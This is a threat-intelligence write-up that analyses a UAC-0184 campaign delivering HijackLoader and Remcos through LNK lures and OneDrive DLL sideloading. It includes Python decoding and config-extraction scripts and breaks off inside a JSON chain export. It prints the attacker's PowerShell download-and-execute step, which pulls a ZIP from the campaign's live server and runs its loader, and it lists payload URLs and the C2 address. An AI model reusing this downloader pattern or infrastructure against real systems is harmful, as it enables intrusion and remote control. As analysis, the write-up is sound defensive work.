
by Robin Dost
Malware: HijackLoader / IDATLoader -> Remcos Agent 7.1.0 Pro
Actor tracking: UAC-0184 / MB-0005
Related analysis: UAC-0184: From HTA to a Signed Network Stack
A YARA rule for this sample is available on request: contact@robin-dost.de.
In my previous UAC-0184 analysis, I documented a loader chain built around a legitimate Plane9 application, several local payload containers and a pseudo-PNG file carrying additional stages inside its IDAT chunks.
That chain eventually unpacked a collection of signed utilities and a PassMark network component.
The sample analyzed in this article uses a visibly different delivery package and ends with a much clearer final payload.
Plane9 has been replaced with Microsoft OneDrive components, the local container names have changed and the campaign now delivers a fully configured Remcos Agent.
Underneath those changes, however, much of the loader architecture remains familiar.
The result is a useful example of tooling evolution for us: the exterior rotated, while the more expensive internal loading pipeline was retained.
Starting with the initial archive
The initial archive is named:
spisokszch.zip
with the SHA256
c74bb6fb848cdb87c2b4261da1efc078023cdf95aa7b1436c52c26f3a11025af
It contains five files:
JPG_012.jpg.lnk
JPG_013.jpg.lnk
JPG_014.jpg.lnk
spisokszch.xlsx.lnk
README.txt
Despite their names, none of the four apparent image or spreadsheet files are actual documents.
They are Windows shortcut files.
The archive therefore presents the victim with three apparent JPG images and one Excel workbook, while Windows may hide the final .lnk extension depending on the local Explorer configuration.
The accompanying README.txt is written in Ukrainian and instructs the recipient to extract the files to the desktop before opening them:
Інструкція як відкрити файли
1. Витягніть їх з архіву (розпакуйте) на робочий стіл. Якщо Ви будете відкривати їх всередині архіву, то вони не відкриються
2. Двічі клацніть по розпакованих файлах
--- EN
Instructions for opening the files:
1. Extract them from the archive to the desktop.
They will not open if launched from inside the archive.
2. Double-click the extracted files.
This instruction is operationally useful for the attacker.
Launching shortcuts directly from an archive can behave differently depending on the archive utility and extraction context. Asking the victim to extract everything first ensures that the LNK files are placed together on disk and executed in a predictable environment.
It also gives the request a legitimate explanation: the files supposedly need to be unpacked because they cannot be opened from inside the ZIP.

Four lures, one execution pattern
Each LNK launches cmd.exe with delayed variable expansion enabled.

The command reconstructs the string:
MSXML2.XMLHTTP
from two smaller variables:
MSXM
L2.XML
It then writes a temporary VBScript that:
- creates an MSXML2.XMLHTTP object;
- performs an HTTP GET request;
- sets a Windows PowerShell-style User-Agent;
- writes the response using ADODB.Stream;
- saves it as a temporary .ps1 file.
The shortcut subsequently executes the VBScript through cscript, launches the downloaded PowerShell file with a hidden window and deletes both temporary files.
The effective flow is:
The split strings and wildcard-heavy Get-Command expression are not sophisticated obfuscation.
They are enough, however, to break simple searches for complete API names or common PowerShell download commands.
The four shortcuts reference four separate PowerShell URLs:
JPG_012.jpg.lnk
-> http://144.31.236.240/szch45/ritecommunion.ps1
JPG_013.jpg.lnk
-> http://144.31.236.240/szch45/shoutnewspaper.ps1
JPG_014.jpg.lnk
-> http://144.31.236.240/szch45/hintprefix.ps1
spisokszch.xlsx.lnk
-> http://144.31.236.240/szch45/collectivisationgown.ps1
The PowerShell downloaders
The recovered PowerShell stages are almost identical.
They first check whether the secondary archive already exists:
szch45clusterhum.zip
If it does not, they download it from:
http://144.31.236.240/szch45clusterhum.zip
The scripts use an obfuscated Get-Command expression to resolve Invoke-WebRequest, then save the ZIP into the current working directory.
They subsequently extract the archive into:
MSWinDistro
Finally, they execute:
MSWinDistro/ClusterHub.exe
and open one of the decoy images / document included in the downloaded ZIP.
The difference between the recovered scripts is the decoy selected after execution:
ritecommunion.ps1
-> JPG_012.jpg
shoutnewspaper.ps1
-> JPG_013.jpg
hintprefix.ps1
-> JPG_014.jpg
collectivisationgown.ps1
-> spisokszch.xlsx
The behavior can be simplified to:
```powershell
if (!(Test-Path "szch45clusterhum.zip")) {
    Invoke-WebRequest `
        -Uri "http://144.31.236.240/szch45clusterhum.zip" `
        -OutFile "szch45clusterhum.zip"
}
Expand-Archive `
    "szch45clusterhum.zip" `
    -DestinationPath "MSWinDistro"
Start-Process "MSWinDistro/ClusterHub.exe"
Start-Process "MSWinDistro/JPG_012.jpg"
```
After extraction, the scripts execute MSWinDistro/ClusterHub.exe and attempt to open one of the files carrying a .jpg extension; the two recovered scripts, ritecommunion.ps1 and shoutnewspaper.ps1, select JPG_012.jpg and JPG_013.jpg respectively.
However, the files are not valid JPEG images.
Their headers resemble deliberately corrupted or incomplete PNG signatures and standard file identification reports them only as generic data.

The PowerShell start command therefore only proves that Windows is instructed to open the files through the registered .jpg handler. It does not prove that a valid image is displayed to the victim.
No static reference indicating that ClusterHub.exe repairs or decrypts these files was identified in the analyzed loader components.
They may serve as malformed decoys, auxiliary containers or artifacts intended to create visible activity while the sideload chain starts in parallel.
Delivery and C2 on the same server
The IP address:
144.31.236.240
appears throughout the chain.
It hosts:
/szch45/ritecommunion.ps1
/szch45/shoutnewspaper.ps1
/szch45/hintprefix.ps1
/szch45/collectivisationgown.ps1
/szch45clusterhum.zip
The final Remcos configuration also points back to the same address:
144.31.236.240:27018
This means the observed server performs at least two operational roles:
- HTTP payload delivery;
- TCP Remcos command and control.
There is no domain, redirector or separate delivery layer in the recovered artifacts.
The shortcuts connect directly to an IP address, the PowerShell scripts retrieve the second archive directly from the same IP and the final payload is configured to use that IP for C2.
From an operational-security perspective, this is convenient but noisy.
A single infrastructure indicator links the initial downloader, the secondary archive and the final malware controller.


I’m familiar with this subnet (AS202226) and fairly confident about the provider behind this IP address: h2.nexus.
They offer cheap Windows Server hosting that can be paid for via cryptocurrency, and they also support anonymous purchases through a Telegram bot.
In the last few samples I’ve analyzed, they used a different provider (Kraken-Network ISP).
This was consistent for some time, but now we see a change. This change also has to do with the deployment of Remcos V2, because they need a Windows VPS for hosting their C2 center.

The full chain
The complete execution sequence becomes:
Yeah, I know, the chain is long…
… but each layer solves a specific problem:
- the initial ZIP provides the lure context;
- the LNK files hide executable command lines behind document names;
- the temporary VBScript performs the first download;
- PowerShell downloads and extracts the larger package;
- the legitimate OneDrive binary provides the sideload host;
- local .sym and .map files hide the encoded stages;
- the HijackLoader bundle handles modular execution;
- Remcos provides the final remote-access capability.
Inside szch45clusterhum.zip
The second archive contains the following relevant files:
ClusterHub.exe
LoggingPlatform.dll
UpdateRingSettings.dll
monitor_base.sym
physicsdesc.map
JPG_012.jpg
JPG_013.jpg
JPG_014.jpg
spisokszch.xlsx
It also contains several Microsoft Visual C++ runtime libraries:
msvcp140.dll
msvcp_win.dll
ucrtbase.dll
vcruntime140.dll
vcruntime140_1.dll
This makes the directory look like a self-contained Windows application package.
The filenames UpdateRingSettings.dll and LoggingPlatform.dll fit naturally into a Microsoft software environment. The .sym and .map extensions can easily be dismissed as symbols, diagnostics or application metadata.
The decoy files also match the names presented by the original shortcuts.
The initial lure archive contains:
JPG_012.jpg.lnk
while the downloaded archive contains:
JPG_012.jpg
The PowerShell stage starts the malware and then opens the corresponding real image.
It is not only filename masquerading; it is a complete handoff from a fake shortcut to the real decoy document.

The OneDrive disguise
ClusterHub.exe is not a custom loader built from scratch.
Internally, it contains extensive Microsoft OneDrive and OneDrive Patcher strings, including:
OneDrivePatcher.exe
Microsoft.OneDrive.Sync.Client
UpdateRingSettings.dll
LoggingPlatform.DLL

The associated DLLs also retain legitimate-looking OneDrive symbols and type information.
This gives the package a much cleaner appearance than a random unsigned executable surrounded by several encrypted payloads.
ClusterHub.exe loads UpdateRingSettings.dll, which acts as the malicious loader component. LoggingPlatform.dll is also part of the local dependency chain and appears to preserve or forward expected functionality.
The attacker therefore did not only choose a signed executable that happens to search its local directory for a DLL.
They packaged the malicious loader inside a coherent collection of OneDrive-related components.
That is the first major visual change compared with the previous sample.
The earlier chain used a Plane9 application, the new chain uses Microsoft OneDrive software.
The two files that matter
The main local payload containers are:
monitor_base.sym
physicsdesc.map
Neither file is what its extension suggests.
Both begin with large amounts of printable filler, making them appear text-like when inspected superficially.

The relevant structures are located further inside the files.
The local loading sequence can be reduced to:
This is where the similarities to the previous UAC-0184 sample become difficult to ignore.
monitor_base.sym: the small loader stage
monitor_base.sym is approximately 35 KB.
Most of its beginning consists of filler.
At offset 0x6BD8, the file contains a small structure describing the encoded payload:
Decoded size: 0x2084
Key: 0x3A12EA50
The following data is decoded by adding the key to each 32-bit value.
The result is 8,324 bytes of x64 shellcode.
No complex encryption is involved at this stage.
It is a simple DWORD addition operation.
The decoded shellcode contains several useful strings:
tapisrv.dll
IDAT
IEND
PNG
GET
http
Rtl...
The IDAT, IEND and PNG strings reveal the purpose of the next stage.
The shellcode searches for and processes PNG-style chunks inside physicsdesc.map.
The references beginning with Rtl also lead to the later use of RtlDecompressBuffer.
physicsdesc.map: another image that is not an image
The larger physicsdesc.map file is approximately 1.36 MB.
It does not begin with a valid PNG signature.
Instead, the file starts with another large filler region. The first real PNG-style IDAT chunk appears at offset:
0x4052
From this position onward, the file contains:
164 × IDAT chunks
1 × IEND chunk
Most IDAT chunks contain 8,192 bytes.
The file is not a valid image, but enough of the internal PNG chunk structure is retained for the shellcode to parse it.
The loader searches using a pattern equivalent to:
????IDAT
The four wildcard bytes correspond to the big-endian chunk length preceding the IDAT type.
The shellcode concatenates the data areas of all matching chunks and interprets the first 16 bytes of the resulting stream as metadata.
For this sample, the recovered values are:
Marker: 0xEA79A5C6
DWORD XOR key: 0x54EBEC5E
Compressed size: 0x145E3A
Decompressed size: 0x20AE58
The following payload data is XORed DWORD by DWORD using:
0x54EBEC5E
The XOR output is then decompressed using:
RtlDecompressBuffer
CompressionFormat = 2
Compression format 2 corresponds to:
COMPRESSION_FORMAT_LZNT1
The final decompressed bundle is approximately 2.14 MB.
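Both local stages can be reproduced off-box with a few dozen lines. The block below is an added reference decoder, not the author's tooling or the loader's own code: `decode_dword_add` covers the monitor_base.sym stage (32-bit addition with the key), and `decode_idat_container` runs the physicsdesc.map pipeline (scan for `????IDAT`, concatenate chunk data, read the 16-byte header, DWORD XOR, LZNT1). LZNT1 is reimplemented in pure Python instead of calling RtlDecompressBuffer so it runs on any platform. Assumptions that the page does not fix byte-for-byte: DWORDs are little-endian, chunks keep the standard PNG layout of length, type, data and a 4-byte CRC, the header order is marker, XOR key, compressed size, decompressed size, and a trailing partial DWORD is left unchanged by the XOR step. The container built by `build_sample_container` is constructed test data; only the marker and XOR key values come from the sample.

```python
import struct

MASK32 = 0xFFFFFFFF

def decode_dword_add(blob: bytes, key: int) -> bytes:
    """monitor_base.sym stage: add the key to every full 32-bit value (mod 2^32)."""
    out = bytearray(blob)
    for i in range(0, len(blob) - len(blob) % 4, 4):
        struct.pack_into("<I", out, i, (struct.unpack_from("<I", blob, i)[0] + key) & MASK32)
    return bytes(out)

def decode_dword_xor(blob: bytes, key: int) -> bytes:
    """physicsdesc.map stage: XOR every full 32-bit value with the fixed key.
    A trailing partial DWORD is left untouched (our assumption about the loader)."""
    out = bytearray(blob)
    for i in range(0, len(blob) - len(blob) % 4, 4):
        struct.pack_into("<I", out, i, struct.unpack_from("<I", blob, i)[0] ^ key)
    return bytes(out)

def collect_idat_data(container: bytes) -> bytes:
    """Locate every '????IDAT' (big-endian length + chunk type) without requiring
    a PNG signature and concatenate the chunk data areas in file order."""
    parts, pos = [], 0
    while True:
        idx = container.find(b"IDAT", pos)
        if idx < 4:  # not found, or no room for the length field in front of it
            break
        length = struct.unpack_from(">I", container, idx - 4)[0]
        start = idx + 4
        if start + length > len(container):
            break
        parts.append(container[start:start + length])
        pos = start + length + 4  # skip the data and the CRC field
    return b"".join(parts)

def lznt1_decompress(data: bytes) -> bytes:
    """LZNT1 as read by RtlDecompressBuffer with CompressionFormat = 2."""
    out, pos = bytearray(), 0
    while pos + 2 <= len(data):
        header = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if header == 0:
            break
        chunk_end, chunk_start = pos + (header & 0x0FFF) + 1, len(out)
        if not header & 0x8000:  # stored chunk: copied verbatim
            out += data[pos:chunk_end]
            pos = chunk_end
            continue
        while pos < chunk_end:
            flags, pos = data[pos], pos + 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not flags & (1 << bit):  # literal byte
                    out.append(data[pos])
                    pos += 1
                    continue
                n, d = len(out) - chunk_start - 1, 0  # token split widens with chunk output
                while n >= 0x10:
                    n, d = n >> 1, d + 1
                token = struct.unpack_from("<H", data, pos)[0]
                pos += 2
                length, back = (token & (0xFFF >> d)) + 3, (token >> (12 - d)) + 1
                for _ in range(length):  # byte-wise copy so overlapping runs work
                    out.append(out[-back])
    return bytes(out)

def decode_idat_container(container: bytes) -> dict:
    """Full physicsdesc.map pipeline: chunk scan -> header -> DWORD XOR -> LZNT1."""
    stream = collect_idat_data(container)
    if len(stream) < 16:
        raise ValueError("no usable IDAT data found")
    marker, xor_key, comp_size, decomp_size = struct.unpack_from("<4I", stream, 0)
    bundle = lznt1_decompress(decode_dword_xor(stream[16:16 + comp_size], xor_key))
    if len(bundle) != decomp_size:
        raise ValueError(f"got {len(bundle)} bytes, header announces {decomp_size}")
    return {"marker": marker, "xor_key": xor_key, "bundle": bundle}

# Constructed test data. SAMPLE_LZNT1 is a hand-built compressed chunk:
# literals A, B, C followed by a 9-byte back-reference of distance 3.
SAMPLE_LZNT1, SAMPLE_PLAIN = bytes.fromhex("05b0084142430620"), b"ABCABCABCABC"
SAMPLE_MARKER, SAMPLE_XOR_KEY = 0xEA79A5C6, 0x54EBEC5E  # values from the sample

def png_chunk(ctype: bytes, data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + ctype + data + b"\0\0\0\0"  # CRC left zero

def build_sample_container() -> bytes:
    """Printable filler, no PNG signature, two IDAT chunks, then IEND."""
    header = struct.pack("<4I", SAMPLE_MARKER, SAMPLE_XOR_KEY, len(SAMPLE_LZNT1), len(SAMPLE_PLAIN))
    payload = header + decode_dword_xor(SAMPLE_LZNT1, SAMPLE_XOR_KEY)  # XOR is its own inverse
    filler = b"; physics descriptor table v2\n" * 8
    return filler + png_chunk(b"IDAT", payload[:20]) + png_chunk(b"IDAT", payload[20:]) + png_chunk(b"IEND", b"")
```

`decode_idat_container(build_sample_container())` returns the marker and key from the header together with the 12-byte plaintext. On the real file the size check at the end is the useful signal: a wrong key or a wrong chunk layout assumption produces garbage that rarely decompresses to exactly the announced 0x20AE58 bytes.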

The same loader architecture
This is the clearest technical connection to the previous sample.
The earlier chain:
The new chain:
The values changed:
- different filenames;
- different offsets;
- different arithmetic keys;
- different XOR keys;
- different IDAT count;
- different decompressed payload.
The architecture did not.
Both chains use:
- a small local file containing arithmetic-encoded shellcode;
- a larger secondary container with a printable filler prefix;
- PNG-style IDAT chunks without a valid PNG header;
- concatenation of chunk data;
- fixed 32-bit XOR decoding;
- Windows LZNT1 decompression;
- a larger modular payload bundle;
- execution through a legitimate software package.
This is a much more useful tracking characteristic than a filename or hash.
Hashes disappear when the sample is rebuilt.
The loader architecture requires actual development work to replace.
A 35-module HijackLoader bundle
The decompressed output contains a table of 35 named modules.
Relevant entries include:
LauncherLdr64
modCreateProcess
modCreateProcess64
modTask
modTask64
modUAC
modUAC64
modWD
modWD64
modWriteFile
modWriteFile64
rshell
rshell64
ti
ti64
CUSTOMINJECT
CUSTOMINJECTPATH
PERSDATA
The module names expose the framework's modular design.
There are separate 32-bit and 64-bit components for:
- process creation;
- scheduled-task execution;
- UAC-related functionality;
- Windows Defender interaction;
- writing files;
- reverse-shell execution;
- custom injection.
The observed format is consistent with HijackLoader, also tracked as IDATLoader.
The IDAT container is therefore not an isolated packer trick.
It belongs to a wider modular loader framework that can deploy different components and final payloads depending on its configuration.
Embedded PE files inside the loader bundle
The 35 module entries do not represent 35 standalone executables.
Many of them are shellcode fragments, configuration blocks or small architecture-specific routines. However, a structural scan of the fully decompressed HijackLoader bundle recovered eight complete PE files.
These files were carved from the same LZNT1-decompressed bundle described above, not from the final Remcos payload.
| Embedded PE | Architecture | Internal role or identification |
|---|---|---|
| tcpvcon.exe | x86 | Microsoft Sysinternals TCPView Console |
| FIXED | x86 | Info-ZIP-based archive utility |
| LauncherLdr64 | x64 | 64-bit launcher component |
| tinystub | x86 | 32-bit execution stub |
| tinystub64 | x64 | 64-bit execution stub |
| tinyutilitymodule.dll | x86 | 32-bit utility DLL |
| tinyutilitymodule64.dll | x64 | 64-bit utility DLL |
| CUSTOMINJECT | x86 GUI | HearthstoneDeckTracker.exe, likely used as the CUSTOMINJECT host |
Seven of the eight PE offsets correspond directly to entries in the recovered 35-module table.
The exception is tcpvcon.exe, which is stored near the beginning of the decompressed bundle before the named module data.
The first embedded executable is the legitimate Microsoft Sysinternals TCPView Console utility. Its original strings and license resources remain intact, including:
Usage: tcpvcon [-a] [-c] [-n] [process name or PID]
The module named FIXED contains Info-ZIP strings and appears to be a bundled or modified ZIP command-line utility.

The remaining binaries form part of the loader's execution and injection framework, with separate components for 32-bit and 64-bit systems.
The final carved PE is a legitimate copy of HearthstoneDeckTracker.exe. Its placement within the bundle suggests that it may be used as a host process for the loader's CUSTOMINJECT execution path, rather than being the injector itself.

Importantly, this executable is not the final Remcos payload!
Remcos is stored separately in an encrypted tail region and only becomes a valid PE after applying the repeating 200-byte XOR layer and removing the leading key area.
This distinction shows that the decompressed stage is not simply a packed RAT. It is a complete deployment framework containing legitimate utilities, architecture-specific loaders, execution stubs and a signed host process for custom injection around the separately encrypted final payload.
A retained internal deployment path
One configuration value is especially interesting:
%windir%\SysWOW64\input.dll
The same destination also appeared in the previous UAC-0184 sample.
In the earlier chain, input.dll belonged to the PassMark-based execution stack and was deployed together with VSLauncher.exe.
The new loader bundle again contains the same input.dll path.
This is a stronger tooling connection than the generic use of DLL sideloading.
The external software stack changed from Plane9 to OneDrive, but part of the internal deployment logic remained intact.
That is often how real tooling evolution looks.
Operators rotate the components most visible to defenders while retaining internal routines, path conventions and loader modules that continue to work.
The final encrypted region
The modular bundle contains another encrypted area of approximately 514 KB.
Its first 200 bytes form the XOR key.
Applying those 200 bytes cyclically to the complete encrypted region turns the key area into zeroes. A valid PE file begins immediately afterward at offset:
0xC8
The recovered executable identifies itself as:
Remcos Agent 7.1.0 Pro
Unlike the final stage in the previous sample, this leaves little ambiguity about the intended capability.
HijackLoader handles staging and execution.
Remcos provides the remote-access functionality.
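The 200-byte layer is simple enough to verify by hand, and the verification is the point: if the region really carries its own key, the key area must XOR to zeroes and a PE header must follow immediately at 0xC8. The block below is an added example, not the author's script. `SAMPLE_PE_STUB` and `SAMPLE_KEY` are constructed test data; the function names are ours.

```python
# Key length stated on the page: the first 200 bytes of the encrypted region.
KEY_LEN = 200


def strip_embedded_xor_key(region: bytes, key_len: int = KEY_LEN) -> bytes:
    """XOR the whole region with its own first key_len bytes, applied cyclically,
    and drop the leading key area. That area XORs to zeroes by construction, so
    the embedded file starts right after it (offset 0xC8 for a 200-byte key)."""
    if len(region) <= key_len:
        raise ValueError("region is not longer than the key area")
    key = region[:key_len]
    return bytes(b ^ key[i % key_len] for i, b in enumerate(region))[key_len:]


def looks_like_pe(blob: bytes) -> bool:
    """Cheap validity check: MZ signature and an e_lfanew that points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# Constructed sample: a minimal MZ/PE header stub and an arbitrary 200-byte key.
SAMPLE_PE_STUB = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\0" * 60
SAMPLE_KEY = bytes((i * 37 + 11) & 0xFF for i in range(KEY_LEN))


def build_sample_region(key: bytes = SAMPLE_KEY, payload: bytes = SAMPLE_PE_STUB) -> bytes:
    """Key area followed by the payload XORed with the key, continuing the cycle
    from where the key area left off (so the key stream index is just i % len)."""
    return key + bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))
```

`strip_embedded_xor_key(build_sample_region())` returns the stub unchanged and `looks_like_pe` accepts it, whereas the encrypted region itself fails the MZ check. On a real carve, run `looks_like_pe` on the output before spending time on it: a wrong region start shifts the key and produces noise instead of a header.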


Recovering the Remcos configuration
The Remcos executable contains a resource named:
SETTINGS
The resource uses RC4 encryption and follows a simple structure:
- 1 byte: key length;
- 62 bytes: RC4 key;
- remaining bytes: encrypted configuration.
Decrypting the resource produces 58 configuration fields.
Relevant values include:
C2: 144.31.236.240:27018
Install filename: remcos.exe
Mutex: Rmc-X5JFP2
Log filename: logs.dat
Screenshot path: Screenshots
Microphone path: MicRecords
The key difference from the previous sample is the presence of a clear, statically recoverable controller.
The earlier PassMark-based bundle did not expose an unambiguous external C2 endpoint in the analyzed artifacts.
This Remcos configuration does:
144.31.236.240:27018
The address is the same server used by the LNK shortcuts and PowerShell downloaders.
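A resource with this layout can be decrypted and searched for the controller without running the sample. The block below is an added example, not the author's extractor: it parses the one-byte key length, applies RC4 with the key that follows, and pulls the first host:port pair from the plaintext. RC4 is implemented inline. The resource built by `build_sample_resource` is constructed; the page does not specify how the 58 fields are delimited, so the `|` separator in `SAMPLE_CONFIG` is ours, while the field values themselves are the ones listed above.

```python
import re


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_settings(resource: bytes) -> bytes:
    """Parse [key_len:1][key:key_len][rc4(config)] and return the plaintext."""
    if not resource or resource[0] == 0 or len(resource) < 1 + resource[0]:
        raise ValueError("malformed SETTINGS resource")
    key_len = resource[0]
    return rc4(resource[1:1 + key_len], resource[1 + key_len:])


# IPv4:port anywhere in the decrypted blob; enough to pull the C2 out.
C2_RE = re.compile(rb"\b(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\b")


def extract_c2(plaintext: bytes) -> str:
    """Return the first host:port pair found in the decrypted configuration."""
    m = C2_RE.search(plaintext)
    if not m:
        raise ValueError("no host:port pair in configuration")
    return m.group(0).decode()


# Constructed sample: a 62-byte key (the length seen in the analyzed resource)
# and a few of the field values listed above, joined with our own separator.
SAMPLE_KEY = bytes(range(0x41, 0x41 + 62))
SAMPLE_CONFIG = b"144.31.236.240:27018|remcos.exe|Rmc-X5JFP2|logs.dat|Screenshots|MicRecords"


def build_sample_resource(key: bytes = SAMPLE_KEY, config: bytes = SAMPLE_CONFIG) -> bytes:
    """Assemble a resource in the stated layout from a key and a plaintext config."""
    return bytes([len(key)]) + key + rc4(key, config)
```

`extract_c2(decrypt_settings(build_sample_resource()))` returns `144.31.236.240:27018`. Against a real resource, the first byte tells you where the ciphertext starts; if decryption yields no readable strings at all, the key-length byte or the key itself was read from the wrong offset.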

The decoy material
The secondary archive includes three image files:
JPG_012.jpg
JPG_013.jpg
JPG_014.jpg
and one spreadsheet:
spisokszch.xlsx

The Excel sheet spisokszch.xlsx is an internal Ukrainian military roster of AWOL/desertion cases (СЗЧ): 39 soldiers with names, ranks, AWOL dates, order and criminal case number and status.
In this redacted version, all names, case/order numbers and unit IDs are removed by me, since I don’t know if this file is authentic.
These file names correspond directly to the initial LNK lures.
The recovered PowerShell scripts explicitly open either JPG_012.jpg or JPG_013.jpg after starting ClusterHub.exe.
The images therefore serve as visible decoys.
The spreadsheet is a valid workbook containing a single sheet with 108 used rows.
Its content relates to Ukrainian military administration and includes fields such as:
- military rank;
- full name;
- date of unauthorized absence;
- date of return;
- appointment and result order numbers;
- referrals to the State Bureau of Investigation;
- ERDR case information;
- current location or status.
The workbook contains personal information, so individual rows and names are intentionally not reproduced here.
The targeting context is nevertheless clear.
It relates to Ukrainian military personnel and unauthorized absence cases.
The document may have been created as a tailored lure, modified from an existing document or reused after being obtained elsewhere.
The artifact alone does not establish which scenario is correct.
It does demonstrate that the delivery package was prepared for a specific Ukrainian military-administrative audience.
What changed from the previous sample?
The tooling evolution becomes easier to see side by side.
| Component | Previous sample | New sample |
|---|---|---|
| Initial lure | LNK leading to gated HTA stages | ZIP containing four document-named LNK files |
| First downloader | bitsadmin / mshta.exe | cmd.exe → temporary VBScript → PowerShell |
| Delivery server | 169.40.135.35 | 144.31.236.240 |
| Secondary archive | dctrprraclus.zip | szch45clusterhum.zip |
| Extraction directory | %APPDATA%\ApplicationData32 | MSWinDistro |
| Visible host | Plane9 / Cluster-Overlay64.exe | OneDrive Patcher renamed ClusterHub.exe |
| Loader DLLs | Plane9Engine.dll, openvr_api.dll, evr.dll | UpdateRingSettings.dll, LoggingPlatform.dll |
| Small container | kernel-diag.lib | monitor_base.sym |
| Large container | filter.bin | physicsdesc.map |
| Container design | Fake prefix plus PNG IDAT chunks | Fake prefix plus PNG IDAT chunks |
| Initial decoding | DWORD addition | DWORD addition |
| Main decoding | DWORD XOR | DWORD XOR |
| Compression | LZNT1 | LZNT1 |
| Bundle | Eight carved PEs and PassMark stack | 35 named HijackLoader modules |
| Reused path | %windir%\SysWOW64\input.dll | %windir%\SysWOW64\input.dll |
| Final capability | Signed network-capable utility stack | Remcos Agent 7.1.0 Pro |
| Static C2 | Not recovered | 144.31.236.240:27018 |
The delivery mechanism changed more substantially than the internal decoding pipeline.
The previous chain relied on HTA files and a gated delivery path.
The new sample uses document-named shortcuts, a temporary VBScript downloader and small PowerShell stages.
Once ClusterHub.exe starts, however, the chain returns to a familiar design.
This suggests that the delivery mechanism and the core loader can be changed independently.
The actor can replace the initial access package without rebuilding the complete payload framework.
Infrastructure Intelligence Model chain
The observed infrastructure and artifact flow can be represented as the following IIM chain:
[ENTRY]
spisokszch.zip
├── README.txt
├── JPG_012.jpg.lnk
├── JPG_013.jpg.lnk
├── JPG_014.jpg.lnk
└── spisokszch.xlsx.lnk
[STAGING]
JPG_012.jpg.lnk
└── downloads /szch45/ritecommunion.ps1
JPG_013.jpg.lnk
└── downloads /szch45/shoutnewspaper.ps1
JPG_014.jpg.lnk
└── downloads /szch45/hintprefix.ps1
spisokszch.xlsx.lnk
└── downloads /szch45/collectivisationgown.ps1
[DELIVERY INFRASTRUCTURE]
144.31.236.240
├── hosts PowerShell stages
└── hosts /szch45clusterhum.zip
[SECONDARY STAGING]
PowerShell stage
└── downloads szch45clusterhum.zip
├── ClusterHub.exe
├── UpdateRingSettings.dll
├── LoggingPlatform.dll
├── monitor_base.sym
└── physicsdesc.map
[LOADER PIPELINE]
ClusterHub.exe
└── executes UpdateRingSettings.dll
└── decodes monitor_base.sym
└── parses physicsdesc.map
└── reconstructs HijackLoader bundle
[PAYLOAD]
HijackLoader bundle
└── decodes Remcos Agent 7.1.0 Pro
[C2]
Remcos
└── 144.31.236.240:27018

(IIM view in KRAKEN)
If you want to work with the chain yourself, here’s the JSON.
{
"actor_id": "UAC-0184",
"attack_annotations": [
{
"name": "Malicious File",
"technique_id": "T1204.002"
},
{
"name": "PowerShell",
"technique_id": "T1059.001"
},
{
"name": "Mshta / signed binary proxy execution context not used in this sample; retained only for comparison",
"technique_id": "T1218.005",
"x_comparison_only": true
},
{
"name": "DLL Side-Loading",
"technique_id": "T1574.002"
},
{
"name": "Deobfuscate/Decode Files or Information",
"technique_id": "T1140"
},
{
"name": "Embedded Payloads",
"technique_id": "T1027.009"
},
{
"name": "Process Injection",
"technique_id": "T1055"
}
],
"chain": [
{
"entity_id": "e_initial_zip",
"role": "entry",
"role_confidence": "confirmed",
"technique_confidence": "confirmed",
"techniques": [
"IIM-T024"
]
},
{
"entity_id": "e_readme",
"role": "entry",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_lnk_012",
"role": "entry",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_lnk_013",
"role": "entry",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_lnk_014",
"role": "entry",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_lnk_xlsx",
"role": "entry",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_ps1_rite_url",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_ps1_shout_url",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_ps1_hint_url",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_ps1_collect_url",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_rite_ps1",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_shout_ps1",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_delivery_ip",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_payload_zip_url",
"role": "staging",
"role_confidence": "confirmed",
"technique_confidence": "likely",
"techniques": [
"IIM-T024"
]
},
{
"entity_id": "e_payload_zip",
"role": "staging",
"role_confidence": "confirmed",
"technique_confidence": "confirmed",
"techniques": [
"IIM-T024"
]
},
{
"entity_id": "e_clusterhub",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_update",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_logging",
"role": "staging",
"role_confidence": "likely",
"techniques": []
},
{
"entity_id": "e_monitor",
"role": "staging",
"role_confidence": "confirmed",
"technique_confidence": "tentative",
"techniques": [
"IIM-T025"
]
},
{
"entity_id": "e_shellcode",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_physics",
"role": "staging",
"role_confidence": "confirmed",
"technique_confidence": "tentative",
"techniques": [
"IIM-T025"
]
},
{
"entity_id": "e_idat_stream",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_hijack_bundle",
"role": "staging",
